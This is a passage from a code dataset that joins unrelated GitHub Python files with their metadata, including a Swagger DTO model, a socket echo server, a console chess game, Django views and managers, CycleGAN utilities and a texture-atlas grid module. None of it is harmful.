this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._service\n\n @service.setter\n def service(self, service):\n \"\"\"Sets the service of this MonitoredServiceDTO.\n\n Service Name of the monitored service # noqa: E501\n\n :param service: The service of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n if self._configuration.client_side_validation and service is None:\n raise ValueError(\"Invalid value for `service`, must not be `None`\") # noqa: E501\n\n self._service = service\n\n @property\n def service_instance_count(self):\n \"\"\"Gets the service_instance_count of this MonitoredServiceDTO. # noqa: E501\n\n Service Instance count of the monitored service # noqa: E501\n\n :return: The service_instance_count of this MonitoredServiceDTO. # noqa: E501\n :rtype: int\n \"\"\"\n return self._service_instance_count\n\n @service_instance_count.setter\n def service_instance_count(self, service_instance_count):\n \"\"\"Sets the service_instance_count of this MonitoredServiceDTO.\n\n Service Instance count of the monitored service # noqa: E501\n\n :param service_instance_count: The service_instance_count of this MonitoredServiceDTO. # noqa: E501\n :type: int\n \"\"\"\n if self._configuration.client_side_validation and service_instance_count is None:\n raise ValueError(\"Invalid value for `service_instance_count`, must not be `None`\") # noqa: E501\n\n self._service_instance_count = service_instance_count\n\n @property\n def source(self):\n \"\"\"Gets the source of this MonitoredServiceDTO. # noqa: E501\n\n Source of the monitored service # noqa: E501\n\n :return: The source of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._source\n\n @source.setter\n def source(self, source):\n \"\"\"Sets the source of this MonitoredServiceDTO.\n\n Source of the monitored service # noqa: E501\n\n :param source: The source of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n if self._configuration.client_side_validation and source is None:\n raise ValueError(\"Invalid value for `source`, must not be `None`\") # noqa: E501\n\n self._source = source\n\n @property\n def status(self):\n \"\"\"Gets the status of this MonitoredServiceDTO. # noqa: E501\n\n Status of monitored service # noqa: E501\n\n :return: The status of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, status):\n \"\"\"Sets the status of this MonitoredServiceDTO.\n\n Status of monitored service # noqa: E501\n\n :param status: The status of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"ACTIVE\", \"INACTIVE\"] # noqa: E501\n if (self._configuration.client_side_validation and\n status not in allowed_values):\n raise ValueError(\n \"Invalid value for `status` ({0}), must be one of {1}\" # noqa: E501\n .format(status, allowed_values)\n )\n\n self._status = status\n\n @property\n def update_user_id(self):\n \"\"\"Gets the update_user_id of this MonitoredServiceDTO. # noqa: E501\n\n Last update user id of monitored service # noqa: E501\n\n :return: The update_user_id of this MonitoredServiceDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._update_user_id\n\n @update_user_id.setter\n def update_user_id(self, update_user_id):\n \"\"\"Sets the update_user_id of this MonitoredServiceDTO.\n\n Last update user id of monitored service # noqa: E501\n\n :param update_user_id: The update_user_id of this MonitoredServiceDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._update_user_id = update_user_id\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(MonitoredServiceDTO, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, MonitoredServiceDTO):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, MonitoredServiceDTO):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"wavefrontHQ/python-client","sub_path":"wavefront_api_client/models/monitored_service_dto.py","file_name":"monitored_service_dto.py","file_ext":"py","file_size_in_byte":18814,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"21653915109","text":"import os\nimport select\nimport socket\nimport sys\nsys.path.insert(0, os.path.abspath(\n os.path.join(os.path.dirname(__file__), '../..')))\n\nfrom utils.bcolors import bcolors\n\nBASE_DIR = os.path.dirname(os.path.realpath(__file__))\n\n# create a socket object\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# get local machine name\nhost = socket.gethostname()\n\n# set a port number\nport = 9999\n\nserver_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\nserver_socket.bind((host, port))\nserver_socket.listen(5)\n\n# Set up a list of sockets to monitor\nsockets_list = [server_socket]\n\n# Set up a dictionary to keep track of clients and their data\nclients = {}\n\nprint('\\n' + bcolors.OKGREEN + \"Server started.\" + bcolors.ENDC + '\\n')\n\nwhile True:\n # Monitor the sockets for incoming data\n read_sockets, _, _ = select.select(sockets_list, [], [])\n\n for sock in read_sockets:\n # Handle incoming connections\n if sock == server_socket:\n client_socket, client_address = server_socket.accept()\n sockets_list.append(client_socket)\n clients[client_socket] = {'data': b''}\n print(bcolors.OKBLUE +\n f\"New connection from {client_address[0]}:{client_address[1]}\" + bcolors.ENDC)\n\n # Handle incoming data from clients\n else:\n try:\n data = sock.recv(1024)\n if data:\n clients[sock]['data'] += data\n else:\n # No more data from the client, remove the socket\n print(\n bcolors.FAIL + f\"Connection closed by {sock.getpeername()[0]}\" + bcolors.ENDC)\n sockets_list.remove(sock)\n del clients[sock]\n except:\n # Connection closed unexpectedly, remove the socket\n print(\n bcolors.FAIL + f\"Connection closed by {sock.getpeername()[0]}\" + bcolors.ENDC)\n sockets_list.remove(sock)\n del clients[sock]\n\n # Send data back to all connected clients\n for sock in clients:\n if clients[sock]['data']:\n if clients[sock]['data'] == b'exit':\n response = bcolors.FAIL+'Goodbye!'+bcolors.ENDC\n sock.sendall(response.encode())\n continue\n\n response = bcolors.OKBLUE + f\"You sent: {clients[sock]['data'].decode()}\" + bcolors.ENDC\n sock.sendall(response.encode())\n clients[sock]['data'] = b''\n","repo_name":"Irwnda/network-programming","sub_path":"tugas1/server/server_select.py","file_name":"server_select.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14001338610","text":"import chess as ch, ChessEngine as ce\n\nclass Main:\n\n def __init__(self, board):\n self.board = board\n self.colour, self.maxDepth = None, -1\n self.gamePlayer = 1\n\n def printLegalMoves(self):\n print(\"\\nLegal Move List : \" + str(self.board.legal_moves)[37:-1])\n\n def resetGame(self):\n self.board.reset\n self.startGame()\n self.colour, self.maxDepth = ch.WHITE, None\n\n def gameOver(self):\n print(self.board)\n print(self.board.outcome)\n\n def playMove(self, turnFirst, boardPrint):\n if turnFirst == \"comp\":\n self.playEngineMove(ch.WHITE)\n print(self.board)\n self.playEngineMove(ch.BLACK)\n\n\n elif turnFirst:\n if self.colour == \"w\":\n self.playHumanMove()\n \n elif self.colour == \"b\":\n\n self.colour = \"w\"\n self.playEngineMove(ch.WHITE)\n \n elif not turnFirst:\n if self.colour == \"w\":\n\n self.colour = \"b\"\n self.playEngineMove(ch.BLACK)\n \n elif self.colour == \"b\":\n self.playHumanMove()\n \n if boardPrint:\n print(self.board)\n\n #Player's Turn\n def playHumanMove(self):\n try:\n self.printLegalMoves()\n\n play = input(\"Your move : \")\n self.board.push_san(play)\n\n except:\n self.playHumanMove()\n\n #Engine's Turn\n def playEngineMove(self, colour):\n print(\"Processing...\")\n\n engine = ce.Engine(self.board, self.maxDepth)\n\n self.board.push(engine.getBestMove(colour))\n\n #Run Game\n def startGame(self):\n # Get player information\n\n while True:\n try:\n self.gamePlayer = int(input(\"Singleplayer (1), Computer vs Computer (0) : \"))\n if self.gamePlayer == 0 or self.gamePlayer == 1:\n self.gamePlayer = bool(self.gamePlayer)\n break\n \n else:\n continue\n \n except:\n continue\n\n while not self.maxDepth > 1:\n try:\n if self.gamePlayer:\n while self.colour != \"w\" and self.colour != \"b\":\n self.colour = input(\"Play as (type 'w' or 'b'): \")\n\n self.maxDepth = int(input(\"Choose engine depth (recommended 4) : \")) # Note: Depth needs to be bumped by 1 to prevent errors\n\n except ValueError:\n print(\"ERROR: Invalid Depth, set value to 4\")\n self.maxDepth = 4\n\n\n print(str(self.board)+\"\\n\")\n\n\n\n while not self.board.is_checkmate():\n if not self.gamePlayer:\n self.playMove(\"comp\", True)\n\n if self.gamePlayer:\n self.playMove(True, True)\n self.playMove(False, True)\n\n self.gameOver()\n self.resetGame()\n\n\n#create an instance and start a game\nnewBoard = ch.Board()\ngame = Main(newBoard)\nrunGame = game.startGame()","repo_name":"Flynn1460/V3","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14209436946","text":"myList = [1, 2, 3, 1, 2, 5, 6, 7, 8]\r\ncleanlist = []\r\n\r\n[cleanlist.append(x) for x in myList if x not in cleanlist]\r\n\r\n#2nd option\r\ncleanlist2=[]\r\nfor x in myList:\r\n if x not in cleanlist2:\r\n cleanlist2.remove(x)\r\nprint(cleanlist2)\r\n\r\n","repo_name":"keshavprashanth/Python_Learning","sub_path":"exercises/list_remove_duplicate.py","file_name":"list_remove_duplicate.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27083516015","text":"# Дано: список, содержащий URL страниц\n# Требуется: Написать функцию, которая получает из Сети код страниц из списка и сохраняет его (код) на диск.\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_html(urls):\n for url in urls:\n page = requests.get(url)\n soup = BeautifulSoup(page.content, 'html.parser')\n with open(f'document_{urls.index(url)}.html', 'w', encoding='utf-8') as file:\n file.write(str(soup))\n\n\nget_html(['https://yandex.ru/',\n 'https://google.com/'])\n","repo_name":"dnantonov/tatneft","sub_path":"task2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7250961091","text":"import re\n\npath = 'outputs/col1_col2.txt'\none_col_path = 'col1.txt'\ntwo_col_path = 'col2.txt'\nlines = []\none_col_lines = []\ntwo_col_lines = []\n\nwith open(one_col_path, 'r') as fp:\n one_col_lines = fp.readlines()\n\nwith open(two_col_path, 'r') as fp:\n two_col_lines = fp.readlines()\n\nfor index in range(len(one_col_lines)):\n lines.append(\"{0}\\t{1}\".format(\n re.sub('[\\r\\n]', '', one_col_lines[index]),\n re.sub('[\\r\\n]', '', two_col_lines[index])\n ))\n\nwith open(path, 'w') as fp:\n fp.write('\\n'.join(lines))\n fp.write('\\n')\n","repo_name":"aki202/nlp100","sub_path":"chapter2/013.py","file_name":"013.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15803329324","text":"# -*- coding: utf-8 -*-\n\nfrom django.db.models import Manager\n\nfrom utils import parse_date_w3dtf\n\nclass CalendarManager(Manager):\n def get_or_create(self, account, data):\n uri = data.id.text\n try:\n result = self.get(uri = uri)\n except self.model.DoesNotExist:\n result = self.model(account = account)\n result.uri = uri\n for prop in ['summary', 'timezone', 'title', 'where']:\n attr = getattr(data, prop)\n if hasattr(attr, 'text'):\n setattr(result, prop, attr.text or '')\n for link in data.link:\n if link.rel == 'alternate':\n result.feed_uri = link.href\n return result\n\nclass EventManager(Manager):\n def get_or_create(self, calendar, data):\n uri = data.id.text\n try:\n result = self.get(uri = uri)\n except self.model.DoesNotExist:\n result = self.model(calendar = calendar)\n result.uri = uri\n result.title = data.title.text or ''\n result.content = data.content.text or ''\n try:\n result.where = data.where[0].value_string\n except IndexError:\n pass\n try:\n result.start_time = parse_date_w3dtf(data.when[0].start_time)\n result.end_time = parse_date_w3dtf(data.when[0].end_time)\n except:\n pass\n\n result.edit_uri = data.GetEditLink().href\n result.view_uri = data.GetHtmlLink().href\n return result","repo_name":"garethr/django-googlecalendar","sub_path":"googlecalendar/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"} +{"seq_id":"27479478765","text":"from django.db.models import Count, Q\n\nfrom django.utils.decorators import method_decorator\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView, FormView\nfrom django.views.generic.base import TemplateView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.list import ListView\n\nfrom django.urls import reverse_lazy, reverse, path, include\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.contrib.auth.tokens import default_token_generator\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.contrib.auth.views import PasswordChangeView\nfrom django.core.exceptions import PermissionDenied\n\nfrom django.http import HttpResponseForbidden, HttpResponseRedirect\nfrom django.contrib.auth import get_user_model\nfrom django.shortcuts import redirect, render, get_object_or_404\nfrom django.views.decorators.http import require_http_methods\n\nfrom guardian.shortcuts import get_objects_for_user\nimport rules\n\nfrom extra_views import UpdateWithInlinesView, InlineFormSetFactory, ModelFormSetView\n\nfrom core.mixins import formviewMixins, viewMixins\nfrom formtools.wizard.views import SessionWizardView\n\nfrom fixture.models import Matches\nfrom users.models import PlayerProfile, PhoneNumber, Document, ClubProfile\nfrom league.models import Season\nfrom verification.models import Verification\n\nfrom . import forms\n\nLOGIN_URL = reverse_lazy('login')\n\nurlpatterns = []\n\n\nclass Home(LoginRequiredMixin, TemplateView):\n template_name = 'dashboard/home.html'\n login_url = LOGIN_URL\n\n def get_context_data(self, **kwargs):\n ctx = super().get_context_data(**kwargs)\n user = self.request.user\n club = user.get_club()\n if club:\n ctx['upcoming_matches'] = \\\n Matches.get_upcoming_matches_of_club(club)\n\n if user.is_player() and not club:\n profile = user.get_profile()\n if profile:\n ctx['club_offers'] = profile.get_all_offers()\n\n if user.is_club():\n if Season.objects.first().is_transfer_window_open():\n ctx['player_quota'] = club.player_quota_left()\n\n is_match_manager = rules.test_rule('manage_match', self.request.user)\n if is_match_manager:\n num_players = Count('players')\n num_noacc_players = Count('players', filter=Q(players__user=None))\n num_unverified_players = Count('players', filter=~Q(\n players__verification__status='VERIFIED'))\n clubInfo = ClubProfile.objects.annotate(\n num_players=num_players,\n num_noacc_players=num_noacc_players,\n num_unverified_players=num_unverified_players,\n )\n ctx['clubInfo'] = clubInfo\n\n return ctx\n\n\nurlpatterns += [path('home/', Home.as_view(), name='home'), ]\n\n\nclass Calendar(viewMixins, TemplateView):\n template_name = 'dashboard/calendar.html'\n login_url = LOGIN_URL\n\n def get_context_data(self, **kwargs):\n ctx = super().get_context_data(**kwargs)\n ctx['matches'] = Matches.get_upcoming_matches()\n ctx['done_matches'] = Matches.objects.filter(\n status=Matches.STATUS.done).order_by('-date')\n return ctx\n\n\nurlpatterns += [path('calendar/', Calendar.as_view(), name='calendar'), ]\n\n\nclass documentEditView(LoginRequiredMixin, formviewMixins, FormView):\n form_class = forms.imageEditForm\n template_name = 'dashboard/image_edit.html'\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n kwargs['instance'] = get_object_or_404(\n Document, pk=self.kwargs.get('pk', None)\n )\n return kwargs\n\n def form_valid(self, form):\n form.save()\n return super().form_valid(form)\n\n\nurlpatterns += [path('documentedit//',\n documentEditView.as_view(),\n name='documentedit'), ]\n\n\nclass documentUploadView(LoginRequiredMixin, formviewMixins, UpdateView):\n model = Document\n fields = ['image', ]\n template_name = 'dashboard/image_upload.html'\n\n def get_success_url(self):\n redirect_url = self.request.POST.get('redirect_url', None)\n if redirect_url:\n return redirect_url\n\n return reverse('dash:documentedit', kwargs={\n 'pk': self.kwargs.get('pk')})\n\n\nurlpatterns += [path('documentupload//',\n documentUploadView.as_view(),\n name='documentupload'), ]\n","repo_name":"prajeeshag/VFF","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21114849997","text":"import os\n\nFLAGS = _ = None\nDEBUG = False\n\n\ndef main():\n if DEBUG:\n print(f'Parsed arguments {FLAGS}')\n print(f'Unparsed arguments {_}')\n\n\nif __name__ == '__main__':\n root_path = os.path.abspath(__file__)\n root_dir = os.path.dirname(root_path)\n os.chdir(root_dir)\n\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--debug', action='store_true',\n help='The present debug message')\n\n FLAGS, _ = parser.parse_known_args()\n DEBUG = FLAGS.debug\n\n main()\n\n","repo_name":"munhyunsu/p2p-chain","sub_path":"main_clinet.py","file_name":"main_clinet.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9651665034","text":"# References:\n # https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix/blob/master/util/image_pool.py\n\nimport torch\nfrom torchvision.utils import make_grid\nfrom einops import rearrange\nimport numpy as np\nfrom PIL import Image\nfrom pathlib import Path\nfrom datetime import timedelta\nfrom time import time\nimport os\nimport random\nfrom collections import OrderedDict\n\n\ndef get_device():\n if torch.cuda.is_available():\n device = torch.device(\"cuda\")\n else:\n device = torch.device(\"cpu\")\n return device\n\n\ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n os.environ[\"PYTHONHASHSEED\"] = str(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef denorm(tensor, mean, std):\n tensor *= torch.Tensor(std)[None, :, None, None]\n tensor += torch.Tensor(mean)[None, :, None, None]\n return tensor\n\n\ndef _batched_image_to_grid(image, n_cols):\n b, _, h, w = image.shape\n assert b % n_cols == 0,\\\n \"The batch size should be a multiple of `n_cols` argument\"\n pad = max(2, int(max(h, w) * 0.016))\n grid = make_grid(tensor=image, nrow=n_cols, normalize=False, padding=pad)\n grid = grid.clone().permute((1, 2, 0)).detach().cpu().numpy()\n grid *= 255\n grid = np.clip(a=grid, a_min=0, a_max=255).astype(\"uint8\")\n\n for k in range(n_cols + 1):\n grid[:, (pad + h) * k: (pad + h) * k + pad, :] = 255\n for k in range(b // n_cols + 1):\n grid[(pad + h) * k: (pad + h) * k + pad, :, :] = 255\n return grid\n\n\ndef image_to_grid(x, y, x_mean, x_std, y_mean, y_std, n_cols):\n x = x.detach().cpu()\n y = y.detach().cpu()\n\n x = denorm(x, mean=x_mean, std=x_std)\n y = denorm(y, mean=y_mean, std=y_std)\n\n images = [x, y]\n gen_image = rearrange(\n torch.cat(images, dim=0), pattern=\"(n m) c h w -> (m n) c h w\", n=len(images),\n )\n grid = _batched_image_to_grid(gen_image, n_cols=n_cols)\n return grid\n\n\ndef _to_pil(img):\n if not isinstance(img, Image.Image):\n img = Image.fromarray(img)\n return img\n\n\ndef save_image(image, path):\n path = Path(path)\n path.parent.mkdir(parents=True, exist_ok=True)\n _to_pil(image).save(str(path), quality=100)\n\n\ndef get_elapsed_time(start_time):\n return timedelta(seconds=round(time() - start_time))\n\n\ndef set_requires_grad(models, grad):\n for model in models:\n for p in model.parameters():\n p.requires_grad = grad\n\n\nclass ImageBuffer(object):\n# \"To reduce model oscillation we update the discriminators using a history of generated images rather than the\n# ones produced by the latest generators. We keep an image buffer that stores the 50 previously created images.\"\n def __init__(self, buffer_size, stored_images=list()):\n self.buffer_size = buffer_size\n\n self.stored_images = stored_images\n self._cnt = len(stored_images)\n\n def __call__(self, image):\n images_to_return = list()\n for unbatched_image in image:\n if self._cnt < self.buffer_size:\n self.stored_images.append(unbatched_image)\n self._cnt += 1\n images_to_return.append(unbatched_image)\n else: # buffer가 가득 찼다면\n if random.random() > 0.5: # 50%의 확률로\n idx = random.randrange(len(self.stored_images))\n images_to_return.append(self.stored_images[idx].clone()) # buffer에서 하나의 이미지를 빼고\n self.stored_images[idx] = unbatched_image # 새로운 이미지를 저장합니다.\n else: # 다른 50%의 확률로\n images_to_return.append(unbatched_image) # 입력 받은 이미지를 그대로 출력합니다.\n new_image = torch.stack(images_to_return, dim=0)\n return new_image\n\n\ndef _modify_state_dict(state_dict, keyword=\"_orig_mod.\"):\n new_state_dict = OrderedDict()\n for old_key in list(state_dict.keys()):\n if old_key and old_key.startswith(keyword):\n new_key = old_key[len(keyword):]\n else:\n new_key = old_key\n new_state_dict[new_key] = state_dict[old_key]\n return new_state_dict\n","repo_name":"KimRass/CycleGAN","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"12525927343","text":"import math\nfrom typing import Dict, Literal\n\nfrom PIL import Image\nfrom pydantic import BaseModel\n\nfrom atlas_texture_creator.atlas_texture import AtlasTexture\n\n\nAtlasGridDirection = Literal[\"row\", \"column\"]\n\n\nclass AtlasGridItem(BaseModel):\n column: int\n row: int\n\n\nclass GenerateAtlasOptionsSize(BaseModel):\n width: int\n height: int\n\n\nclass GenerateAtlasOptions(BaseModel):\n lock_size: GenerateAtlasOptionsSize | None\n\n\nclass GenerateAtlasCoordTexture(BaseModel):\n x: int\n y: int\n width: int\n height: int\n\n\nGenerateAtlasReturnType = Dict[str, GenerateAtlasCoordTexture]\n\n\nclass GenerateAtlasReturnTypeOut(BaseModel):\n __root__: GenerateAtlasReturnType\n\n\nclass GenerateAtlasTextureCoords:\n def __init__(self, init_data: GenerateAtlasReturnType = None):\n if init_data is None:\n init_data = {}\n\n self.data: GenerateAtlasReturnType = init_data\n\n def add_data(self, label: str, data: GenerateAtlasCoordTexture):\n self.data[label] = data\n\n def json(self):\n return GenerateAtlasReturnTypeOut.parse_obj(self.data).json()\n\n\nclass AtlasCollectionTextureStore:\n def __init__(self, grid_direction: AtlasGridDirection = \"row\"):\n self._textures: list[list[AtlasTexture]] = []\n self.grid = AtlasGrid(direction=grid_direction)\n\n # 1 = self._textures[0][0] = [[1]] # new array\n # 2 = self._textures[0][1] = [[1, 2]]\n # 3 = self._textures[1][0] = [[1, 2], [3]] # new array\n # 4 = self._textures[1][1] = [[1, 2], [3, 4]]\n # 5 = self._textures[0][2] = [[1, 2, 5], [3, 4]]\n # 6 = self._textures[2][0] = [[1, 2, 5], [3, 4], [6]] # new array\n # 7 = self._textures[1][2] = [[1, 2, 5], [3, 4, 7], [6]]\n # 8 = self._textures[2][1] = [[1, 2, 5], [3, 4, 7], [6, 8]]\n # 9 = self._textures[2][2] = [[1, 2, 5], [3, 4, 7], [6, 8, 9]]\n # 10 = self._textures[0][3] = [[1, 2, 5, 10], [3, 4, 7], [6, 8, 9]]\n # 11 = self._textures[3][0] = [[1, 2, 5, 10], [3, 4, 7], [6, 8, 9], [11]] # new array\n # 12 = self._textures[1][3] = [[1, 2, 5, 10], [3, 4, 7, 12], [6, 8, 9], [11]]\n # 13 = self._textures[3][1] = [[1, 2, 5, 10], [3, 4, 7, 12], [6, 8, 9], [11, 13]]\n # 14 = self._textures[2][3] = [[1, 2, 5, 10], [3, 4, 7, 12], [6, 8, 9, 14], [11, 13]]\n # 15 = self._textures[3][2] = [[1, 2, 5, 10], [3, 4, 7, 12], [6, 8, 9, 14], [11, 13, 15]]\n # 16 = self._textures[3][3] = [[1, 2, 5, 10], [3, 4, 7, 12], [6, 8, 9, 14], [11, 13, 15, 16]]\n # 17 = self._textures[0][4] = [[1, 2, 5, 10, 17], [3, 4, 7, 12], [6, 8, 9, 14], [11, 13, 15, 16]]\n # 18 = self._textures[4][0] = [[1, 2, 5, 10, 17], [3, 4, 7, 12], [6, 8, 9, 14], [11, 13, 15, 16], [18]] # new array\n # self._textures[self.row_counter][self.column_counter]\n # arrays = row; numbers in array = column\n # column = 0 = new array\n\n def add(self, texture: AtlasTexture):\n id = len(self.grid)\n texture.id = id\n grid_item = self.grid.add()\n self._store_texture(texture, column=grid_item.column, row=grid_item.row)\n\n def replace(self, texture: AtlasTexture, row: int, column: int):\n self._textures[column][row] = texture\n\n def _store_texture(self, texture: AtlasTexture, row: int, column: int):\n texture.set_coord(column=column, row=row)\n\n if len(self._textures) == column:\n self._textures.append([])\n\n self._textures[column].append(texture)\n\n def get(self, row: int, column: int):\n return self._textures[column][row]\n\n def column(self, column: int):\n return self._textures[column]\n\n def row(self, row: int):\n row_list = []\n\n for column in self._textures:\n texture = column[row]\n row_list.append(texture)\n\n return row_list\n\n def __iter__(self):\n # COLUMNS\n for column in self._textures:\n for item in column:\n yield item\n\n # ROWS: # TODO: NOT WORKING\n # counter = 0\n # all_items_yield = False\n # while not all_items_yield:\n # for row in self._textures:\n # try:\n # yield row[counter]\n # except IndexError:\n # all_items_yield = True\n # break\n # counter += 1\n\n # square_number = math.ceil(math.sqrt(self._store_length))\n #\n # for column in range(square_number):\n # for row in range(square_number):\n # try:\n # yield self.get(row=row, column=column)\n # except IndexError:\n # break\n\n def __getitem__(self, item):\n return self._textures[item]\n\n def __len__(self):\n return len(self.grid)\n\n def _coord_flip(self):\n self._add_to_column = 0 if self._add_to_column == 1 else 1\n\n def _reset_add_to_column(self):\n self._add_to_column = 0\n\n\nclass AtlasCollection:\n def __init__(self, name: str):\n super().__init__()\n self.name = name\n self.texture_id = 1\n self.texture_store = AtlasCollectionTextureStore()\n\n def add_texture(self, texture_path: str, label: str) -> AtlasTexture:\n atlas_texture = AtlasTexture(self.texture_id, texture_path, label)\n self.texture_store.add(atlas_texture)\n return atlas_texture\n\n def load_texture(self, texture: AtlasTexture):\n self.texture_store.add(texture)\n\n def load_textures(self, textures: list[AtlasTexture]):\n for texture in textures:\n self.load_texture(texture)\n\n def get_texture(self, row: int, column: int) -> AtlasTexture:\n return self.texture_store.get(row=row, column=column)\n\n def textures(self) -> AtlasCollectionTextureStore:\n return self.texture_store\n\n def replace_texture(self, new_texture: AtlasTexture):\n column = new_texture.column\n row = new_texture.row\n\n self.texture_store.replace(new_texture, row=row, column=column)\n\n def generate_atlas(self, options: GenerateAtlasOptions = None) -> tuple[Image.Image, GenerateAtlasTextureCoords]:\n textures_coord = GenerateAtlasTextureCoords()\n atlas_width = 0\n atlas_height = 0\n square_number = math.ceil(math.sqrt(len(self.texture_store)))\n lock_texture_width = None\n lock_texture_height = None\n\n if options is not None and options.lock_size:\n lock_texture_width = options.lock_size.width\n lock_texture_height = options.lock_size.height\n\n atlas = Image.new(mode=\"RGBA\", size=(0, 0))\n\n for row in range(square_number):\n column_width = 0\n column_height = 0\n column_imgs = []\n\n for column in range(square_number):\n try:\n texture = self.texture_store.get(row=row, column=column)\n except IndexError:\n continue\n img = Image.open(texture.img_path)\n\n if lock_texture_width is not None or lock_texture_height is not None:\n new_img_width = lock_texture_width or img.width\n new_img_height = lock_texture_height or img.height\n img = img.resize((new_img_width, new_img_height))\n\n img_width, img_height = img.size\n\n if img_width > column_width:\n column_width = img_width\n column_height += img_height\n\n column_imgs.append({\n \"label\": texture.label,\n \"img\": img,\n })\n\n offset_x = atlas_width\n offset_y = 0\n\n atlas_width += column_width\n if column_height > atlas_height:\n atlas_height = column_height\n\n new_atlas = Image.new(\"RGBA\", size=(atlas_width, atlas_height))\n new_atlas.paste(atlas)\n atlas = new_atlas\n\n for img_obj in column_imgs:\n label = img_obj[\"label\"]\n img = img_obj[\"img\"]\n\n textures_coord.add_data(label, GenerateAtlasCoordTexture(\n x=offset_x,\n y=offset_y,\n width=img.width,\n height=img.height,\n ))\n\n atlas.paste(img, (offset_x, offset_y))\n offset_y += img.height\n\n return atlas, textures_coord\n\n def __len__(self):\n return len(self.texture_store)\n\n def __iter__(self):\n for texture in self.textures():\n yield texture\n\n\nclass AtlasGrid:\n def __init__(self, direction: AtlasGridDirection):\n self.direction = direction\n self.squares = 0\n self.column = 0\n self.row = 0\n self.offset = 0\n\n def add(self) -> AtlasGridItem:\n if self._calc_square():\n row = column = self.squares\n\n self._set_next_square()\n else:\n row = column = self.offset\n\n if self.direction == \"row\":\n if self.column == self.row:\n self.row += 1\n row = self.squares\n elif self.column < self.row:\n self.column += 1\n column = self.squares\n self.offset += 1\n elif self.direction == \"column\":\n if self.column == self.row:\n self.column += 1\n column = self.squares\n elif self.row < self.column:\n self.row += 1\n row = self.squares\n self.offset += 1\n\n item = AtlasGridItem(\n column=column,\n row=row,\n )\n\n return item\n\n def _calc_square(self) -> bool:\n l = len(self) + 1\n l_sqrt = math.sqrt(l)\n is_integer = l_sqrt.is_integer()\n\n return is_integer\n\n def _set_next_square(self):\n self.squares += 1\n self.offset = 0\n self.row = 0\n self.column = 0\n\n def __len__(self):\n length = (self.squares * self.squares) + self.row + self.column\n\n return length\n","repo_name":"pgmystery/atlas-texture-creator","sub_path":"atlas-texture-creator/atlas_texture_creator/atlas_collection.py","file_name":"atlas_collection.py","file_ext":"py","file_size_in_byte":10128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17752183091","text":"import numpy as 